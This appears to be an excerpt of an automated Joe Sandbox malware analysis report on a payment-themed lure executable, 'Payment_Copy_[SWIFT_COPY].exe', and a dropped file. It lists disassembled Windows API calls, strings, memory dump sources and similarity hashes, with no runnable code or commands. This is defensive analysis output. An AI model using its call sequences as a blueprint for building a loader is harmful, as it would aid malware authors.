                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3294113728-0
                                                                                                                        • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                                                        • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                                                                                                        • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                                                        • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                        • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                        • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041BA19,755723A0), ref: 00404F0F
                                                                                                                        • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2531174081-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
                                                                                                                        • GetMessagePos.USER32 ref: 004047A5
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004047BF
                                                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
                                                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                                                        • MulDiv.KERNEL32(0005F641,00000064,0005F645), ref: 00402BB4
                                                                                                                        • wsprintfA.USER32 ref: 00402BC4
                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                                                                                                        Strings
                                                                                                                        • verifying installer: %d%%, xrefs: 00402BBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetWindowTextA.USER32(00000000,pkfcbfzkpkrqtkjcmcyn Setup), ref: 0040397B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: TextWindow
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$(`_$1033$pkfcbfzkpkrqtkjcmcyn Setup
                                                                                                                        • API String ID: 530164218-2178668135
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1912718029-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                                                        • wsprintfA.USER32 ref: 0040471E
                                                                                                                        • SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                                                                                                        • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 2659869361-4083868402
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041BA19,755723A0), ref: 00404F0F
                                                                                                                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2987980305-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                                                                                        • lstrlenA.KERNEL32(0040A440,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A440,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040A440,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1356686001-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                                                        • CharNextA.USER32(00000000), ref: 00405761
                                                                                                                        • CharNextA.USER32(00000000), ref: 00405770
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 3213498283-3404278061
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00401D3F
                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                                                        • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsCreateDeviceFontIndirect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3272661963-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C22
                                                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102729457-0
                                                                                                                        • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                                                        • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                                                                                                        • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                                                        • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00404E39
                                                                                                                        • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404EA7
                                                                                                                          • Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                        • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                                                        • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                                                                                                        • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                                                        • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 004035A6
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 1100898210-4083868402
                                                                                                                        • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                                                        • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                                                                                                        • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                                                        • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 00405707
                                                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 00405715
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-1876063424
                                                                                                                        • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                        • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                                                                                                        • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                        • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405833
                                                                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0
                                                                                                                        • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                        • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                                                                                                        • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                        • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:4.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:194
                                                                                                                        Total number of Limit Nodes:5

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 256 4278b7-427a7f call 42705f call 427838 call 427073 * 8 278 427a81 256->278 279 427a86-427a96 256->279 280 427e3c-427e3f 278->280 282 427a98 279->282 283 427a9d-427ac0 CreateFileW 279->283 282->280 284 427ac2 283->284 285 427ac7-427af0 VirtualAlloc ReadFile 283->285 284->280 286 427af2 285->286 287 427af7-427b0a 285->287 286->280 289 427b10-427e21 287->289 290 427e26-427e35 call 42720a 287->290 293 427e37-427e39 ExitProcess 290->293
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocNumaVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4233825816-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 349 4277da-427820 call 42705f call 427073 GetSystemInfo 355 427822-427825 349->355 356 427829 349->356 357 42782b-42782e 355->357 356->357
                                                                                                                        APIs
                                                                                                                        • GetSystemInfo.KERNELBASE(?), ref: 004277F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 31276548-0
                                                                                                                        Uniqueness

